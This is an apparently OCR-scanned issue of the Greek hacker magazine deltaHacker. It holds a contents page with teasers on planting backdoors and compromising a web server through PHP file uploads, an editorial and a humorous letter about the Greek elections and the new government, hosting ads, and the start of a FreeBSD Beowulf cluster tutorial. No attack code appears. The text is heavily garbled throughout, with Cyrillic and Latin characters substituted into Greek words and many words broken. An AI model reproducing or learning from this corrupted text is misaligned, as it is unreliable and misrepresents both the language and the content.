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Ασφαλέστερο OpenSSH, εδώ και τώρα! 

Το Backdoor Factory και οι δυνατότητές του 
Πλαγιομετωπική µε web server, οδηγώντας PHP 

Aiolos Project: Πῶς θα φτιάξετε το δικό σας Beowulf Cluster 


[*] ...για επιτυχή σταδιοδρομία στο ψηφιακό CSI 


και οδηγίες χρήσης 


εντιτοριαλ 


Σκόρπιες σκέψεις, σε µια κάποια σειρά 


σνειλ µει 


O Θείος προσπαθεί να «μη΄ σχολιάσει 
το αποτέλεσµα των εκλογών 


The Aiolos Project 


To πρώτο σας FreeBSD Beowulf Cluster! 


Ασφαλεστερο OpenSSH, 
εδώ και тора 


Με την πάροδο του χρόνου οι τεχνικές επιθέσεων 
βελτιώνονται και κάποιες τριγράµµατες Αρχές βοηθούν 
προς αυτή την κατεύθυνση. Από τη µεριά µας, δεν 
(πρέπει να) καθόμαστε µε σταυρωμένα τα χέρια ;) 


Φυτεψτε backdoors, 
εὖκολα και γρήγορα 


Είναι απίστευτα τα αυτοματοποιηµένα εργαλεία 
που έχουν στη διάθεσή τους οι επιτιθέµενοι. Ώπα, 
μισό. Στα ἴδια εργαλεία έχουµε πρόσβαση κι εμείς. 


I can t remember, 
but my memory dump can! 


Απέχουμε μόλις 6 χρόνια από το έτος 2021, όπου και 
τοποθετείται το σενάριο της ταινίας Johnny Mnemonic. 
Μπορεί να µην ἔχουν εφευρεθεί (ακόµα) τα εγκεφαλικά 

εμφυτεύματα µνήµης, ούτε να υπάρχει το επάγγελµα του 

data courier, αλλά υπάρχουν πολλά δεδοµένα που θα θέ- 

AQUE να προστατεύσουµε και βρίσκονται όλα στη μνήμη. 
Όχι στη δική µας, αλλά σε αυτή των υπολογιστών. 


Πλαγιοµετωπικη µε web server, 
οδηγώντας PHP! 


Γνωρίζατε ότι μπορούμε να στείλουμε αρχεία σε 
servers, που δεν τα ζήτησαν ποτέ; Υπό συνθήκες, 
ΤΟ γεγονός αυτό µπορεί να οδηγήσει στην άλωση 

οποιουδήποτε Server. 


Αναπτυξη εφαρµογωνσε C# 
ια TO .NET [μέρος 2ο] 


Συνεχίζουμε τη γνωριμία µας µε τη Οὔ εξετάζο- 
ντας τα βασικά στοιχεία του συντακτικού της. 


deltaCast 502605 


ev3rydayGnuPG 1/2 
http://deltahacker.gr/deltacast-s02e05 


dot-is domains, 
εὐκολα και OIKOVOLIIKG 
http://deltahacker.gr/dot-is-domains-easy-cheap 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 
Αρχισυντάκτης Παναγιώτης Βαρελάς 
Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 


Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Πέτρος 
Κυλαδίτης, Νίκος Μουρατίδης, Θωμάς Σερμπίνης, Μέσος 
Παπαδόπουλος (ΤΜ), Χρίστος Τόμπρας 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται and την Par- 
abing Creations δώδεκα φορὲς το χρόνο, κάθε µήνα. Н Parabing Creations έχει την 
έδρα της στην Καλαμαριά Θεσσαλονίκης. О δικτυακός τόπος του περιοδικού εἶναι στο 

. То email επικοινωνίας εἶναι το talk2us@deltahacker.gr και ειδικά 
για τις συνδρομές εἶναι το subscriptions@deltahacker.gr. Οι γενικὲς πληροφορἱες για τις 
συνδρομὲς παρατίθενται στο και οι ἰδιες οι παραγγελίες 
γίνονται απὀ το . Όλες οι απὀψεις που εκφράζονται ота 
арӨра δεν εκφράζουν απαραίτητα και τη γνώµη του περιοδικού. 


YOUR VERY OWN PLAYGROUND IN THE CLOUD. 
SECURE & GREEN. PAY AS YOU GO. 


Keep your data in Iceland and take advantage of GreenQloud's cloud 
services powered by abundant, stable and cost effective, clean energy 


• Up to 16 CPUs апа 32gb RAM • Network separation at the 
in the KVM hypervisor hardware level 


_ 


* 64-bit server image templates ° Dedicated IP address and 
including Ubuntu, Debian, reserved bandwidth 


FreeBSD, CentOS and more 
• EC2 compatible 


ComputeQloud™ • Built-in firewall 
Host & Manage • Instant scalability 
e in-browser noVNC client and | 
full root access via ssh • Online dashboard 
a 
e Triple-redundant storage • S3 compatible 
° Full encryption • Bucket websites 
StorageQloud™ * Sync across all platforms e Automatic load-balancing 


Backup & Share 


For more information visit our webiste: www.greenqloud.com 


Σκόρπιες σκέψεις, σε µια κἄποια ора 
by subZraw 


— 
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Αγαπητές κι аүапптої, 


Тора που πληκτρολογὠ αυτὲς τις λέξεις, апо την τηλεόραση στο κα- 
θιστικὀ ακούγεται η δοξολογία για την ορκωμοσία της νέας κυβέρνη- 
σης. 

Δεν σας κρύβω ότι, ακούγοντας τη λειτουργία, εἰμαι λίγο ανήσυχος. 


Γενικά αυτὲς τις μέρες εἶμαι ανήσυχος και, δεν σας το κρύβω, µε δια- 
κατέχει κι ἑνας εκνευρισμὀς. 


Ano πού ν' αρχίσω να σας τα λέω, προς τα NOU να το πάω και πού va 
καταλήξω; 


Ιδέα δεν xw. Καταλαβαϊνω όμως бт! παρόμοιες ανησυχίες έχουμε 
Πολλοί αυτές τις μέρες. Π' αυτό κι арҳіка σκέφτηκα να µη γράψω 
τίποτε σχετικὀ. 


Λες και λείπουν οι βαρύγδουπες δηλώσεις και οι περισπούδαστες ava- 
λύσεις апо τα σὀσιαλ τα μίντια κι апо τα παράθυρα τα τηλεοπτικά, 
δηλαδἠ. 


Απ' την ἄλλη, πάντοτε κατάφερνα να Васо τις OKEWEIC µου σε µια 
διαχειρίσιμη σειρἀ, ὁταν ἀρχιζα να τις γράφω. 


Αυτό ακριβώς αποφάσισα να κάνω και σήμερα - και πρὀκειται για 
ευτυχἠ σύμπτωση то OTI, OUTWC ἡ ἄλλως, EXW να γράψω και το εντι- 
TOPIGA για το VEO τεύχος του deltaHacker. 


Тора, επειδἠ οι σκέψεις εἶναι πολλὲς και та εξωτερικἁ ερεθίσματα 
ακόµη περισσότερα, λίγο πριν αρχίσω την πληκτρολὀγηση rinpa ἄλλη 
μια, σηµαντικἠ για το μικρὀκοσμὀ µου, απόφαση: Να γράψω το Kei- 
μενο µε τη μορφή πολλών, μικρών παραγράφων. Av µη τι ἆλλο, ETO! 
διευκολύνομαι στο να βάζω µια τάξη στο (EOWTEPIKO) χάος - κι αυτή 
εἶναι μία απὀ τις φορὲς που ὁσο περισσότερη η τάξη, τόσο το καλύ- 
τερο. 


Κάναμε λοιπὸν τις εκλογὲς µας. Ωραία тау και σε γενικἐς γραμμὲς 
τις φχαριστήθηκα. Πα να πω ὁμως και την αμαρτία µου, ката τη διάρ- 
κεια της σύντομης προεκλογικἠς περιόδου δεν ἄργησε να µε πιάσει 
και ша капота δυσφορία. Οι λόγοι ἧταν αρκετοί, τώρα ὁμως θέλω va 
αναφέρω μόνο δύο. 


O ἑνας εἶχε να κάνει µε την αισχρἠ, ката την ταπεινἠ µου γνώμη, EK- 
στρατεία φόβου που κυριάρχησε κατὰ την προεκλογικἠ καμπάνια της 
προηγούμενης κυβέρνησης. Το μόνο που δεν ἑκαναν, δηλαδή, ἧταν 
να στέλνουν ανθρώπους έξω апо τις πόρτες µας, οι οποίοι µε το που 
θα τις avoiyaue θα ἑκαναν "μπου" και "μπαμ" στα μούτρα µας. 
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О àÀÀoc λόγος αφορούσε στο εξωπραγματικἀἁ αισιόδοξο, ξανά 
ката την ταπεινή µου γνώμη, ύφος που διέπνεε την εκστρα- 
τεἰα της σημερινῆς κυβέρνησης. Αν ἦταν να στείλουν κι εκεἰ- 
νοι ανθρώπους ἐξω апо τις πόρτες µας, µε TO που θα τις avoi- 
yaue θα βλέπαμε χαμογελαστὰ πρόσωπα να µας δίνουν va 
κόκκινο γαρύφαλλο. 


Σἰριουσλι, γκἀιζ; (Όπως λέμε και στο Λευκαντὶ Ευβοίας.) 


Ἐγιναν οι εκλογές, ἦλθε ο Σύριζα. Οι πρώτες εκπλήξεις ἦταν 
ευχάριστες: Δεν εκτοξεύτηκαν θερμοπυρηνικὲς κεφαλὲς κατὰ 
της χώρας, το apt-get συνέχισε να δουλεύει στους servers, 
ο κόσμος δεν ἑκανε ουρές στα ἑῑ-τι-εμ(ς), τανκς δεν βγήκαν 
στους δρόμους, то ретро της Θεσσαλονίκης εξακολουθεἰ να 
αποτελεἰ éva апо καλύτερα σύντομα ανἐκδοτα - κυκλοφόρη- 
σε και το VEO, γρηγορότερο Raspberry Pi. Σίγουρα θα συμφω- 
νήσετε κι εσεὶς От! όλα αυτά εἶναι θετικά. 


Πολὺ πιο γρήγορα απὀ το αναμενόμενο, οι υπουργοί της νέας 
κυβέρνησης ἀρχισαν τις εξαγγελἰες. 


Πολλὲς εξαγγελἱες - αν και μᾶλλον η λέξη "карүа" ταιριάζει 
καλύτερα. 


Ανεξαρτήτως του αν πιστεύει κἄποιος πως OAd ὁσα υποσχέ- 
θηκαν εἶναι εφικτά ἡ OXI, το αξιοσημείωτο εδὠ εἰναι Оті, για 
πρώτη φορὰ, μία κυβέρνηση φάνηκε αποφασισμένη να κάνει 
πράξη όλα òga υποσχόταν πριν τις εκλογέἑς. 


Κάποιοι θα πουν бт! αυτά τα πράγματα δεν γίνονται. Μπορεί. 
Όμως n κυβέρνηση και οι υπουργοί της δεν πρὀκειται να αγνο- 
ἤσουν, λένε, τη λαϊκή εντολἠ. 


Μάλιστα. 

О λαός μίλησε, και το τι θέλει εἶναι ξεκάθαρο. 
Пат! ἐτσι εἶναι ο λαὸς. 

Πάντα ξεκάθαρος. 


Оті και να πιστεύουμε επ' αυτού, δικαιούμαστε νομίζω να 
υποθέσουμε бт! σημαντικὀ посоото των ψηφοφόρων έδωσε 
εντολἠ στη νέα κυβέρνηση να τερματίσει τη λιτότητα, να διώ- 
Eel τους δανειστὲς, να επαναφέρει την αξιοπρέπεια - βεβαίως 
και την ανάπτυξη pači µε την ευημερία. 


Εντάξει, ἦταν και κάποιοι που ψήφισαν Σύριζα επειδἠ, πολὺ 
апла, ἠθελαν να τιμωρήσουν τους προηγούμενους. 


Катауопто, υπενθυμἰζω орос στον εαυτὀ µου бт! αρκετοί NEE- 
ραν πολύ καλὰ τι ἑκαναν και πράγματι ψήφισαν τον Σύριζα για 
να βάλει Eva τέλος στα στραβά και στα ἄσχημα που µας ἦλθαν 
απὀ το 2010 και μετά. 
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Εἶναι βρε παιδὶ µου σαν να υπάρχει ἑνας διακόπτης, τον опоіо апо τη 
στιγµή που ο Σύριζα πἠρε την εντολἠ θα τον κατεβάσει κι όλα τα ðu- 
σάρεστα θα πάψουν να µας ταλαιπωρούν, ενώ την ἴδια στιγμή το Eva 
кало μετὰ то алло θα αρχίσουν να βελτιώνουν την καθημερινότητα του 
Μέσου Παπαδόπουλου (ΤΜ). 


Θα µου πείτε тора OT! εἶμαι ἁδικα ειρωνικὀς. Τέτοιος διακόπτης δεν 
υπάρχει - και το ξἐρω. Έτσι εἶναι. Ξέρω μάλιστα бт! το ξέρετε που το 
ξέρω, αλλά ξέρετε κάτι; Μην та λέτε σ' εμένα αυτά. Πεῖτε σε ὁσους ni- 
στεύουν бт! τέτοιος διακόπτης πράγματι υπάρχει. 


Εἶναι οι ἴδιοι που λένε πως αν εγκαταλεἰψουμµε το ευρώ και περάσουμε ... 


σε εθνικὀ νόμισμα, Ох! μόνο δεν θα ἐχουμε κανένα πρόβλημα αλλά θα 
βρούμε και την ησυχία µας. 


Πλάκα πλάκα, λέτε να ἐχουν δίκιο; 
Δεν χρειάζεται ν' απαντήσετε. 
Ката τα ἄλλα, έχουμε και TO VEO υπουργό οικονοµικών. 


Δεν ξέρω για 'oac, αλλά εγώ ανέκαθεν ἐβρισκα ενδιαφἐροντα όλα ὁσα 
ἐλεγε. 


Πλέον, τον απολαμβάνω και σε δράση. 
Νομίζω -και μπορεἰ να κάνω λάθος- бт! σε γενικὲς γραμμὲς καλὰ το πάει. 


Ἐχει τις απόψεις του, рпорєі va τις στηρίζει µε επιχειρήματα, εἶναι £u- 
γενικὸς και την ἴδια στιγμή τσεκουράτος, αλλά εἶναι κι ἑτοιμος να κάνει 
στρατηγικἐς υποχωρήσεις. 


Αυτἠ τουλάχιστον εἶναι η αἰσθησή µου, κι ελπἰζω τη στιγμή που θα ða- 
βάζετε αυτὲς τις γραμμὲς να µην xouv ἐλθει τα πάνω като. 


Το παιχνίδι έχει ξεκινήσει για та καλὰ και οι εξελἰξεις εἶναι καταιγιστικἑς. 


Па το пос θα εξελιχθεἰ δεν xw ιδέα, υποψιάζομαι ὁμως бт! TEAIKG και 
οι δύο πλευρὲς θα κάνουν τις υποχωρήσεις τους. H δικἠ µας πλευρά θα 
κάνει τις περισσότερες υποχωρήσεις, όμως τουλάχιστον θα μπορούμε να 
λέμε πως το παλέψαμε. 


Αρχικά, πάντως, η διαπραγμάτευση ἐχει ξεκινήσει μαξιμαλιστικἁ - κι 
απὀ τις δύο πλευρές. 


Λογικό δεν εἶναι να ξεκινά ἐτσι, µια τἐτοια διαπραγμάτευση ; 
Νομίζω oT! λογικὀ εἰναι. 
Μολαταύτα, ἑνας κάποιος εκνευρισμὸς παραδέχομαι бт! µε κυριεύει. 


Ίσως δεν θα μπορούσε να συμβαίνει και διαφορετικά, ὁμως "στο τέλος 
της ημέρας", ὁπως για χρόνια λέγαμε στο Λευκαντὶ Ευβοίας και тора 
μου το μάθατε και το λέτε ὁλοι, пара τον εκνευρισμὀ χαίρομαι που το 
παλεύουμε. 


Ελπίζω να το χαἱρεστε κι εσεἰς. 
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Αγαπητοί pov, 

H συγκυρία, αυτόν το μήνα, ήταν προβληματική. Βασικά λόγω των εκλο- 
үшү. '‚ 

Αν ήταν στο χέρν µου θα τις απέφενγα.,Όχι γνατί δεν τις θεωρούσα ση- 
μαντιχές, κάθε άλλο. Απλά αναρωτιόμουν TUFVON LG. θα είχε va προσθέσω 
HLAV ακόµη άποφη ανάμεσα στις τόσες ἀάλχες. 

Χρονιάρες μέρες x. όλον δεν κάνανε άλλη δουλειά, κπαθόντουσαν να κα- 
ταδεικνύουν αντιφάσεις, να προφητεύουν καταστροφές, να οραματίζονταν 
παραδείσους, να χαράσσουν πόκκινες γραμμές, να καταγγέλλουν συνωμοσί- 
EG. 

Είχα αποφασίσει να επικεντρωθώ στη συνηθισμένη µου θεματολογία. Αυτά 
προχτές, ηµέρα εκλογών. 

Γυρνάω, που λέτε, AMO το εκλογικό κέντρο, και ξεκυνάω να απλώνω τα 
τεφτέρνα µου στο τραπέζι. Πάνω πον πάω να βάλω χαρτί στη γραφομηχανή, 
βλέπω µε την ἄκρη του ματιού την εξαδέλφη va µε παρατηρεί and την πόρτα 
της κουζίνας. Δεν ήταν γνα καλό, το ήξερα, οπότε έκανα τον ανήξερο. 

"θα Υράφεις;" µου λέεν. "Δεν θα περνµένεις τα αποτελέσµατα»" 

"Γνατί να τα περυμένω1 Αφού δεν θα γράφω για τις εκλογές." 


"Δεν θα γράφεις; Καν τν είναν αυτά που έλεγε О αφεντικός σου στο φέι- 
Онтон" 

O αφεντικός роо; Στο φένσµπουκ; Θορνβήθηκα Hal μπήκα να κουτάξω. 

Φρίκη καν πανικός. 

Έπρεπε να το περιμένω. O ανεπρόκοπος, εν Λονδίνου, είχε στείλει per 
στον Κύριο Ехббтт εν μέρους μου, λέεν, ενηµερώνοντάς τον πως αυτόν τον 
μῆνα σκοπεύω, λέεν, να καθυστερήσω την επιστολή διότι, λέει, θα ἤθελα να 
σχολιάσω το αποτέλεσµα των εκλογών. 

Κοίτα να δεις, φίλε µου, μπλέξυμο. Άκου εκεί "θα ήθελα να σχολιάσω το 
αποτέλεσµα των εχλογών"Π Σιγά. µην θα ήθελα. 

Την τελευταία φορά που ήθελα, το Μάνο, πήγανε να µε φάνε. Μόνο που 
δεν έβγαλαν φετφά σε βάρος POV ον χρυσοί ανεγκέφαλοιν. 

θα σας έλεγα YEPATA, αγαπητοί pov, αν νσχυριζόµουν бт δεν είχα tpo- 
pater διαβάζοντας όλα αυτά που μου καταλογίζονταν. Elya τρομάζει καν 
μάλιστα πάρα πολύ. Κρύος ιδρώτας µε είχε λούσεν. 

Ευτυχώς ήταν περαστικό. Εκείνες τις μέρες βρισκόμουν Λονδίνο καν р 
αυτά καν μ' εκείνα το ξεπέρασα. Έφαγα καν τόσα τεύχη να μιλάω για τα 
τζιτζίκνα, οπότε το θέµα ξεχάστηκε εντελώς. 

Έρχεται τώρα O ανεπρόκοπος ex Λονδίνου να µε ρίξεν καν πάλιν στο κα- 
ζάνν. 

Τέλος πάντων. ΟΚ. Να σχολνάσω. Αλλά να σχολιάσω TL, ρε παιδιά; HOw 
γίνανε κοτζάμ εκλογές και δεν καταλάβαμε ποιο ήταν το θέμα. 

Σκεφτείτε το εξής: Κκλογές έγιναν επειδή δεν βγήκε Πρόεδρος ano την 
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προηγούμενη Βουλή. *AVTOG* ήταν ο τυπικός λόγος. K. όµως, καθ' όλη τη 
δνάρκενα της προεκλογικής εκστρατείας κανένας δεν είπε έστω καν µια λέξη 
για τον Πρόεδρο, έτσι, ρε παιδί pov, για να τηρηθούν τα προσχήματα. 


Όλη η συζήτηση έγινε µε καταστροφολογικούς όρους ενδεχόµενης επι- 
στροφής στη δραχμή, που πρέπεν να αποφευχθεί πάση θυσία, μνημονίων που 
πρέπεν να σκιστούν, διεθνών υποχρεώσεων της χώρας που πρέπεν να τηρη- 
θούν, σελίδων που γυρίζουν, καν λοιπά καν λοιπά καν AOLTG. 


θα pov πείτε, ἔτσι δεν Ὑΐνεται πάντα» OK, var. ЕТО. 


Αλλά η διαπίστωση OTL κάτι "ETOL" γινόταν "πάντα" δεν εἶναι επαρκής λό- 
γος για να συνεχίσει να γίνεται έτσι. Για ανώνες ολόκληρους, παλιά, γυνό- 
ντουσαν και ανθρωποθυσίες. Ti, δηλαδή, δεν θα έπρεπε να τις σταματήσουμε 
γνατί µέχρν τότε ἔτσι γινόταν "πάντα": 


Εκλογές λοιπόν. O καθένας το μακρύ του και το κοντό του. 


To δίλημμα παρουσιάστηκε (καν παρουσιάζεται) απλουστευτικά µε όρους 
προσήλωσης ἡ αποστροφής προς τα λεγόμενα "μνημόννα", whatever that 
means. 


Ακόμα καν η καννούργνα µας κυβέρνηση civar κυβέρνηση συνεργασίας δύο 
θεμελνωδώς δναφορετικών κομμάτων, µε µόνο κουνό τους στουχείο τη διακή- 
PUČ της ανάγκης απαγκίστρωσης албо τα "μνημόννα". Κατά τα άλλα, άρµεγε 
καν KOUPEVE. 


Т, γνώμη λοιπόν να εκφράσω, ο παφερός; Να σας πω αν ἥμουν υπέρ ў 
κατά των "μνημονίων"1 Να εκφράσω την αγαλλίασή µου για τη νέα κυβέρνηση 
ў την βαθιά pov ανησυχία; 

Μα, ρε παιδιά, το πανχνίδν δεν παίζεταν εκεί. Ποτέ δεν παιζόταν εκεί. Αν 
δεν µπορεί κανείς να το δεν, πέντε ολόκληρα χρόνια µετά το 2010, εγώ τι 
ελπίδες έχω ο κακομοίρης; Όχν µία, αλλά ούτε δύο, ούτε καν δέκα OAOKAN— 
PEG επιστολές δεν θα αρκούσαν. 


Ta τζντζίκνα καν όσα επί µήνες έγραφα για το αν ακούγονται ἡ όχν θα 
έμοιαζαν µε μικρό ευχάριστο διάλειµµα. 


Δεν θα σχολιάσω λοιπόν. Αλλά νονώθω τον πειρασμό να παραθέσω μερικές 
από τις σκέψεις που κάνω όταν προσπαθώ να κατανοήσω το ελληνικό φαι- 
νόμενο στην τρέχουσα νστορική συγκυρία. 


Κατ' αρχάς, va ξεκαθαρίσω:ς 


Πρώτα πρώτα, όταν μιλάω γνα "τρέχουσα ιστορική συγκυρία" αναφέρομαν 
στα τελευταία Το pe TOO χρόνια. 


Δεύτερον, όταν μιλάω για "ελληννκό φαινόμενο" αναφέρομαν µόνο στα 
πολύ συγκεκριµένα νθδναίτερα χαρακτηριστικά αυτού που ονομάζουμε Eà- 
λάδα καν όχν στην τοπική µορφή που παίρνουν άλλα υπερεθνικά καν 
βραδυκίνητα φαινόμενα όπως 
OL εσωτερικές αντιφάσεις του 
παγκοσμιοπονημένον καπινταλι- 
σμού ή ον γεωπολιτικές εντά- 
σεις στα Βαλκάνια καν στον 
ευρύτερο ευρασιατικὀ χώρο. 


Όχν OTL µια γενικότερη ov- 
ζήτηση δεν θα είχε ενδιαφέρον, 
κάθε άλλο. Αλλά στην παρούσα 
φάση θα συσκότιζε μάλλον την 
κατανόησή µας, παρά θα τη δι- 
ευκόλυνε. 

Λοιπόν. Το βασικό πρόβλημα 
της σημερυνῆς Ελλάδας wo ορ- 
γανωμένον κράτους βρίσκεται, 
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OVELA ре. 


YHAQKER 


NNS 


κατά. την γνώμη μου, σε ένα αντιφατικό φαινόμενο µε δύο πλευρές. 


Από τη µία έχουµε την ασύμμετρη απειλή που συνιστά. για τον κάθε pepo- 
νωμένο πολίτη το σύγχρονο ελληνικό κράτος PE την ανορθολογικότητά του, 
την αυθαιρεσία του, καν τους σχεδόν θεσµοθετηµένους μηχανισμούς κακοδυ- 
αχείρισης, κακοδιοίκησης HAL αναποτελεσματικότητας. 


Από την άλλη έχουµε την απόλυτη, παράδοξη, καν σχεδόν θεσμοθετηµένη 
εξάρτηση του ἴδνου αυτού κράτους από οργανωμένες οµάδες συμφερόντων 
που ασκούν πίεση καν επιρροή -- όπως εἶναι, για παράδειγµα, ον πολιτικού, 
Ον διάφορες επαγγελματικές συντεχνίες, το "Δημόσιο", τα σώματα ασφαλεί- 
ας, ο στρατός, η Εκκλησία, ον κομματικοί μηχανισμοί καν πάεν λέγοντας. 


То αποτέλεσµα αυτής της αντιφατικής κατάστασης εἶναι πως η μόνη σον 
ελπίδα ως Έλληνα πολίτη στα πάρε-δώσε σου µε το κράτος, είναν η βοήθεια 
στην οποία προσβλέπεις προσεταιριζόµενος κάποια από αυτές τις οµάδες 
συμφερόντων -- όποια алб αυτές τυχαίνεν va βρίσκεταν πιο κοντά σε σένα 
Ý στους δικούς σου. 

Δεν μιλάω µόνο үш. το "μέσον" καν τις γνωριμίες. Αυτές εἶναι ειδικές λύ- 
σεις σε ένα γενικότερο πρόβλημα. Αναφέρομαν στο OTL λόγω της δομής καν 
της οργάνωσης του Ελληνικού κράτους, εσύ ως πολίτης Eldar θεµελνωδώς 
ανήμπορος όταν δεν ξέρεις πού KAL σε ποιόν θα πέσεις. 

Elvat αδύνατο να το εμπιστεντείς το κράτος. Κακό του κεφαλιού σου θα 
κάνεις. Προτνμότερο είναν να προσεγγίσεις κάποια ομάδα άσκησης πίεσης 
yla να σε βοηθήσουν πλαγίως, παρά να προσπαθήσεις μόνος σου να βγάλεις 
το φίδι απὀ την τρύπα. 


Ku έτσν όλον είµαστε δέσµιον µιας κατάστασης την οποία όλον επικρίνου- 
µε αλλά κανείς µας δεν µπορεί να αλλάξει -- ακόµα καν αν το θέλει. Πρό- 
πενταν ү. αυτοτροφοδοτούµενο φαινόμενο. 


Γνα να φέρω ένα παράδειγµα, αυτός εἶναι ο λόγος που όταν έρχονταν 
"ον δανειστές" καν µας ζητάνε, ξέρω 'үш, να εξορθολογήσουμε τις δημόσιες 
δαπάνες ἡ να χτυπήσουμε την φοροδιαφυγή, εμείς το μόνο που καταφέρνου- 
µε να κάνουμε είναι να βάλουμε ένα ακόµα χαράτσι της ЛЕН ἡ έναν ακόμα 
ЕМФТА. 


Т, νομίζετε, OTL εκεί στο Υπουργείο Ονκονομικών είναν τυφλοί ἡ βλάκες 
καν δεν βλέπουν πως θα ήταν καλύτερο (καν γνα τους ίδιους) να χτυπήσου- 
νε τη φοροδιαφυγή παρά να πόφουν συντάξεις ἡ να βάλουν τον έναν ἡ TOV 
άλλο φόρο; Mia χαρά το βλέπουνε. Βλάκες δεν είναν. Πραγματικά, θα τους 
συνέφερε να το κάνουν. Απλά δεν рлорооу. 

Εσείς θα µου πείτε, βέβαια, πως είναι θέµα απουσίας πολιτικής βούλη- 
σης. Μακάρν να έχετε δίκνο. 


Δεν το πιστεύω. Κατά τη γνώμη рох, η λύση στο πρόβλημα της Ελλάδας 
*bev% θα έρθει ούτε µε το σκίσυμο των "μνημονίων", ούτε µε την επαναδι- 
απραγμάτευση TOV χρέους, την πληρωμή πολεμικών αποζημιώσεων, την αξι- 
οποίηση του γυγαντοτεράστιου ορυκτού πλούτου της χώρας καν πάεν λέγο- 
утас. Αντά θα πάνε χαμένα αν δεν γίνεν κάτι άλλο. 

Δεν τρέφω μεγάλες φευδανσθήσεις. Μακάρι να έχω άδικο, αλλά δεν то 
νομίζω. Εδώ elpaote, θα δείξεν. 

(θα παρατηρήσατε, αγαπητοί pov, оти σήµερα, 27 Ιανουαρίου, ТОТ) επέ- 
TELO της απελευθέρωσης του Άουσβιτς καν ηµέρα μνήμης του Ολοκαντώμα- 
τος, δεν αναφέρθηκα στις 290 χιλιάδες των χρυσών ανεγκέφαλων, έτσι; Δεν 
θα αναφερθώ. Όχι. Αυτό δεν είναν οικονομικό ἡ συστηµικό πρόβλημα. Εύναν 
πολιτισμικό.) 

Σας ασπάζοµαι, 
θείος Ακάκνος 


DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts µε δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Анєрїкї μαι Ασία. 
Lean-mean control panel, για απόϑυτο Eneyxo. 


Αποητήστε τώρα to δικό casVPS, 

oto cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean10off 
μαι κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το кро πϑάνο, 

Πάντα με KAIK στο http: //bit. ly/digocean1Ooff, 
ουσιαστιμά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD μαι 1TB transfer. 


ill Δεν είναι KI ἄσχημα 


Το πρὠτο σας FreeBSD Beowulf Cluster! 


Τι ακριβώς σκέφτεστε ὀταν ακούτε τον Оро "Beowulf Cluster"; Ἴσως κἄποιοι 
να σκέφτονται λυκανθρώπους, αν και η λέξη "cluster" παραπέμπει σε κάποια 
υπολογιστικἠ διάταξη και ο συνειρμὀς χαλάει. Σε κάθε περίπτωση, αν αναλογιστούμε 
τις ὧρες της νύχτας που περνάμε για να σκεφτόμαστε τα νέα µας project, ἴσως τελικά 
το "λυκάνθρωπος" να µην εἶναι τόσο λανθασμένος Χαρακτηρισμὀς. 


lc ew 


Το πρώτο σας FreeB5D Beouulf Cluster! 
κκ κκ κκ 


Ac σοβαρευτούμε λίγο. Ένα Beowulf Cluster ἡ, αν προτιμάτε, ἑνα Compute Cluster, 
αποτελεἰ Eva σύστημα διασύνδεσης πολλών απλών υπολογιστικὼν μονάδων (π.χ. 
μερικὰ PCs) προκειµένου να δημιουργήσουμε Eva μεγαλύτερο σύστημα για την 
εκτέλεση τεράστιων υπολογισμών. Θα ἐχετε ακούσει για τη μανία που καταβάλλει 
ορισμένους ανθρώπους να υπολογίσουν Eva ακόµα ψηφίο του п, μετὰ апо τα ÕI- 
σεκατομμύρια ψηφία που ¿xouv ἤδη υπολογιστεί. Σίγουρα οι ἄνθρωποι αυτοί εἶναι 
αποφασισμένοι να περάσουν πολλά ευχάριστα απογεύματα, γράφοντας κὠδικα καὶ 
συνδέοντας πρὀσθετα μηχανήματα στο cluster, προκειµένου να πετύχουν το σκοπὀ 
τους. (Μέχρι κάποιος κακοήθης να τους ζητήσει το п στο τετράγωνο.) Άπειρες KIAO- 
βατώρες ρεύματος ἐχουν χαθεί σε τέτοια, χμ, "χρήσιμα" προγράμματα, σε διάφορα 
Beowulf Clusters. Μα кала, θα µου πείτε, αν ἑνα Beowulf Cluster δεν εἶναι χρὴσι- 
ро, γιατὶ να το κατασκευάσουμε; Κατ' αρχάς, αν και το παραπάνω σενάριο συνιστά 
σπατάλη ενέργειας, δείχνει πόσο χρήσιμο µπορεί να γίνει Eva cluster όταν θέλουμε 
να εκτελέσουμε праүратіка πολλούς υπολογισμούς. Апо την ἄλλη, ὁπως Ва έπρεπε 
να γνωρίζετε, εμεἰς δεν κατασκευάζουμε μόνο χρήσιμα πράγματα ;) Πολλὲς φορὲς 
καταπιανόμαστε µε κάποιο project, μόνο και μόνο για να περάσουμε μερικὲς ευχάρι- 
στες και δημιουργικὲς ὧρες, αποκτώντας ταυτόχρονα νέες γνώσεις. Έτσι, µια νύχτα 
σκοτεινὴ σαν ὀλες τις ἄλλες, στριφογυρἰζοντας ανήσυχα κάτω апо τις κουβέρτες, 
γεννήθηκε στο μυαλὸ του γράφοντα η ιδέα της κατασκευἠς του δικού µας Beowulf 
Cluster. To ὀλο εγχείρημα πἠρε το ὀνομα Aiolos Project. 


Н ιστορἰα μέχρι тора 


Το Aiolos Project, την ὥρα που διαβάζετε αυτέςτις γραμμές, συνεχίζει να χτίζεται και 
οι σελίδες της ιστορίας του γράφονται ακόµα. Δεν εἶναι κάτι που έχουμε τελειώσει 
και σκοπεύουµε απλά να παρουσιάσουμε. Αν µας ακολουθήσετε, θα προχωρήσουμε 
βήμα προς βήμα pači, μέχρι το τέλος. Το δικὀ µας cluster θα αποτελείται апо тёо- 
σερα μηχανήματα, αλλά το біко σας µπορεί να αποτελεἰται апо οποιοδἠποτε πλήθος 
*avw* των δύο. Κι αν δεν ἐχετε αληθινά μηχανήματα, μπορείτε να µας ακολουθἠή- 
σετε σ' αυτή την περιπέτεια µε τη βοήθεια μερικών εικονικὠν μηχανών. Σημειώστε 
πάντως ὁτι μπορείτε να χρησιμοποιήσετε OOO καινούρια ἡ пала μηχανήματα θέλετε 
